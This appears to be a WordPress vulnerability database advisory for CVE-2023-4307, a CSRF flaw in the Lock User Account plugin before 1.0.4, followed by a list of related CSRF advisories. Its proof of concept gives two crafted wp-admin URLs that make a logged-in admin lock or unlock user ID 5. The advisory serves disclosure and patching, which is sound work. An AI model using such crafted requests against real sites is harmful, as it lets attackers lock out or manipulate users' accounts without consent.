Lock User Account < 1.0.4 – Arbitrary Account Lock/Unlock via CSRF | CVE 2023-4307 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged in admins lock and unlock arbitrary users via a CSRF attack

Proof of Concept

Make a logged in admin open one of the links below, this will make them lock/unlock the user with ID 5

https://example.com/wp-admin/users.php?action=lock&action2=lock&users%5B0%5D=5

https://example.com/wp-admin/users.php?action=unlock&action2=unlock&users%5B0%5D=5

Affects Plugins

lock-user-account

Fixed in 1.0.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3

Timeline

Publicly Published

2023-08-21 (about 8 months ago)

Added

2023-08-21 (about 8 months ago)

Last Updated

2024-01-26 (about 3 months ago)

Other

Published

Title

Published

2014-08-01

Title

Simple Fields 1.1.6 - Admin Functions CSRF

Published

2014-08-01

Title

Stream Video Player <= 1.4.0 - Setting Manipulation CSRF

Published

2021-11-22

Title

Kudos Donations < 3.1.2 - Arbitrary Items Deletion via CSRF

Published

2022-12-02

Title

Bulk Delete Users by Email <= 1.2 - User Deletion via CSRF

Published

2023-12-27

Title

TerraClassifieds <= 2.0.3 - Cross-Site Request Forgery